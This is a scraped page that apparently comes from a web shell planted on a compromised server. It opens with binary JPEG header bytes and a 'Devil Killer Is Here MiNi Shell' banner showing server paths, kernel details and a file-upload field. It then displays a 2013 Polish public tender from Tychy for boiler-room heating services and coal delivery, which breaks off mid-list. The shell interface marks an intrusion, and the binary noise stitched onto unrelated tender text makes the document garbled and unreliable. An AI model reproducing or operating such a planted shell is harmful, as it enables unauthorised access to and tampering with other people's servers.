JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130821/337810-N-2013.html

<p class="kh_header"><b>Tychy: Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego w kotłowniach 
      węglowych oraz gazowych w nieruchomościach administrowanych przez ROM I i ROM II 
      w Tychach wraz z dostawą węgla kamiennego energetycznego typu  GROSZEK EKO</b><br>
<b>Numer ogłoszenia: 337810 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego w kotłowniach 
      węglowych oraz gazowych w nieruchomościach administrowanych przez ROM I i ROM II 
      w Tychach wraz z dostawą węgla kamiennego energetycznego typu  GROSZEK EKO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego kotłowniach węglowych oraz gazowych w  nieruchomościach administrowanych przez ROM I  i ROM II wraz dostawą węgla kamiennego typu GROSZEK  EKO  

      Zamówienie składa się z dwóch części zwanych dalej zadaniami.

ZADANIE NR 1  -  Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego 
w kotłowniach węglowych oraz w kotłowni gazowej w nieruchomościach administrowanych przez ROM I w Tychach wraz z dostawą węgla kamiennego energetycznego typu GROSZEK EKO

ZADANIE NR 2  -  Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego 
w kotłowniach węglowych oraz w kotłowni gazowej w nieruchomościach administrowanych przez ROM II w Tychach wraz z dostawą węgla kamiennego energetycznego typu GROSZEK EKO.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust.1. pkt. 6) ustawy - Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.53.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZADANIE NR 1  -  wadium wynosi: 2 200,00 zł (słownie: dwa tysiące dwieście złotych )

ZADANIE NR 2  - wadium wynosi: 1 000, 00 zł  (słownie: jeden tysiąc złotych)
Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 - tekst jednolity z późn. zm.).
W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium, należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału         
         w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów: 

          wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
          wykonanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem 
          terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, 
          wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których 
          usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są 
          wykonywane należycie.
          
     dla  ZADANIA Nr 1  -  należy wykazać co najmniej jedną usługę w zakresie obsługi 
     konserwacyjnej kotłowni wraz z dostawą węgla kamiennego (będących przedmiotem jednej 
     umowy) o wartości ogółem nie mniejszej niż  80 000,00 zł ( brutto )

     dla  ZADANIA Nr 2  -  należy wykazać co najmniej jedną usługę w zakresie obsługi 
     konserwacyjnej kotłowni wraz z dostawą węgla kamiennego ( będących przedmiotem jednej 
     umowy) o wartości ogółem nie mniejszej niż  32 000,00 zł ( brutto )

         Do wykazu na wybrane zadanie należy dołączyć dowody, czy ww. usługi i dostawy
         zostały wykonane lub są wykonywane należycie.

        Dowodami, o których mowa powyżej są:

a)	poświadczenie, z tym że  w odniesieniu do nadal wykonywanych usług okresowych lub
     ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem 
     terminu składania ofert
b)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
     wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. a)

         W przypadku, gdy Zamawiający jest podmiotem , na rzecz którego usługi wskazane 
         w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania 
     poświadczeń, o których mowa powyżej.

         Zgodnie z  § 9 ust. 2 rozporządzenia , w postępowaniach o udzielenie zamówienia 
         wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia, wykonawca 
         w miejsce poświadczeń , o których mowa w § 1 ust. 2 pkt 1 może przedkładać dokumenty 
         potwierdzające należyte wykonanie usług , określone w § 1  ust. 1 pkt 3) rozporządzenia 
         Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich 
         może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być 
         składane ( Dz. U. Nr 226 poz. 1817)


        Wykaz usług należy sporządzić odrębnie na każde wybrane zadanie -  wg wzoru druku 
        stanowiącego załącznik nr 5 do SIWZ.     
       ( W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
         spełniać łącznie lub co najmniej jeden z wykonawców ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału         
         w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
     osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
     Zamawiający wymaga następujących dokumentów:

1)	  Oświadczenie, że Wykonawca dysponuje co najmniej jedną osobą posiadającą  
       uprawnienia do pracy na stanowisku eksploatacji w zakresie obsługi , konserwacji, 
       remontów, montażu urządzeń wytwarzających , przetwarzających, przesyłających ciepło 
       oraz innych urządzeń energetycznych
              Oświadczenie należy sporządzić wg wzoru druku stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
            wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), 
            Zamawiający wymaga, złożenia następujących dokumentów: 
            opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
      wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności związanej z przedmiotem zamówienia. 
      Wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej niż:      
     1)   100 000,00 zł -   dla ZADANIA NR 1
     2)     49 000,00 zł -   dla ZADANIA NR 2
            Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
            musi wynikać z treści dokumentu.
            Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
            jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
            związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
            dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
            opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
    

  (W przypadku podmiotów występujących wspólnie warunek ten  wykonawcy mogą spełniać  
  łącznie lub co najmniej jeden z wykonawców). 

                                           Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
            dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
            może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
            opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ
2)	wypełniony i podpisany formularz oferty cenowej - załącznik nr 3a
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
1)	zmian personalnych, adresowych, formy prawnej stron umowy;
2)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT 
   3)  zmiany sposobu i terminu rozliczeń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1  -  Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego 
w kotłowniach węglowych oraz w kotłowni gazowej w nieruchomościach administrowanych przez ROM I w Tychach wraz z dostawą węgla kamiennego energetycznego typu GROSZEK EKO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1  - zakres zamówienia obejmuje: 
1)	dostawę 59 ton węgla energetycznego typu GROSZEK EKO  łącznie z transportem 
      do kotłowni węglowych w budynkach mieszkalnych wielorodzinnych w Tychach, przy 
      ul. Jankowickiej 2, Jankowickiej 4 i Szkolnej 70 

      Orientacyjne zużycie węgla typu GROSZEK EKO przez poszczególne kotłownie wynosi:    
      - kotłownia w budynku, przy ul. Jankowickiej 2  -  19 ton / 12 miesięcy
      - kotłownia w budynku, przy ul. Jankowickiej 4  -  23 tony / 12 miesięcy
      - kotłownia w budynku, przy ul. Szkolnej 70      -  17 ton / 12 miesięcy
                                                                   
      Wymagane parametry węgla:
      Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
      sortymentu 0223/cc o następujących  parametrach:
      -   granulacja 5 - 20 mm, 
      -   średnie do wysokiej zawartości części lotnych 28% - 40%,
      -   wilgotność mniejsza niż 15%,
      -   temperatura topnienia popiołu powyżej 1150 stopni C,
      -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
      Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, lecz 
      nie gorszych niż podane przez Zamawiającego w niniejszej specyfikacji.

      Warunki Zamawiającego dotyczące dostawy węgla:
Dostawa węgla winna być realizowana przez Wykonawcę własnym środkiem transportu do  
miejsc składowania węgla, przy budynkach usytuowanych przy Jankowickiej 2, Jankowickiej 4
i Szkolnej 70,  

Dostawa węgla do  kotłowni węglowych winna być realizowana etapami, po uprzednim 
  	każdorazowym telefonicznym zamówieniu, w jednorazowej dostawie do 10 ton, przez 
upoważnionego pracownika ze strony Zamawiającego. 

  	Przewidywany termin pierwszej dostawy:  wrzesień 2013r. 
      Sposób rozliczenia za dostawę węgla określa wzór umowy stanowiący integralną część SIWZ. 
      
2)	świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego:
a)   w kotłowniach węglowych w budynkach mieszkalnych - wielorodzinnych przy 
      ul. Jankowickiej 2, Jankowickiej 4 i Szkolnej 70  
 b)  w kotłowni gazowej w budynku mieszkalnym - wielorodzinnym przy ul. Browarowej 4
     
Szczegółowy zakres zadania nr 1 określa załącznik nr 1 do SIWZ.  

TERMIN  REALIZACJI  ZAMÓWIENIA DOT.  ZADANIA NR 1:

1.	Dostawa węgla:             od dnia 16.09.2013 r. do dnia 15.09.2014 r.

2.	Obsługa techniczna kotłowni: 
a)  ul. Jankowicka 2      od dnia 16.09.2013 r. do dnia 15.05.2014 r. 
b)  ul. Jankowicka 4      od dnia 16.09.2013 r. do dnia 15.09.2014 r.
c)  ul. Szkolna 70          od dnia 16.09.2013 r. do dnia 15.05.2014 r. 
d)  ul. Browarowa 4       od dnia 16.09.2013 r. do dnia 15.09.2014 r.



Zaleca się aby Wykonawca dokonał wizji lokalnej nieruchomości wyszczególnionych 
w załączniku nr 1 do SIWZ  na zadanie nr 1 celem zapoznania się z ich stanem technicznym.

Zamawiający wymaga, aby Wykonawca przez cały okres realizacji przedmiotowego zamówienia  posiadał punkt całodobowego pogotowia technicznego z telefonem stacjonarnym na terenie nieruchomości administrowanym przez ROM I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.53.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2  -  Świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego 
w kotłowniach węglowych oraz w kotłowni gazowej w nieruchomościach administrowanych przez ROM II w Tychach wraz z dostawą węgla kamiennego energetycznego typu GROSZEK EKO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2  - zakres zamówienia obejmuje: 
1)  dostawę 22 ton węgla energetycznego typu GROSZEK EKO  łącznie z transportem 
     do kotłowni węglowych w budynkach mieszkalnych wielorodzinnych w Tychach, przy 
     Pl. Wolności 2  i ul. Norwida 44. 

     Orientacyjne zużycie węgla typu GROSZEK EKO przez poszczególne kotłownie wynosi:    
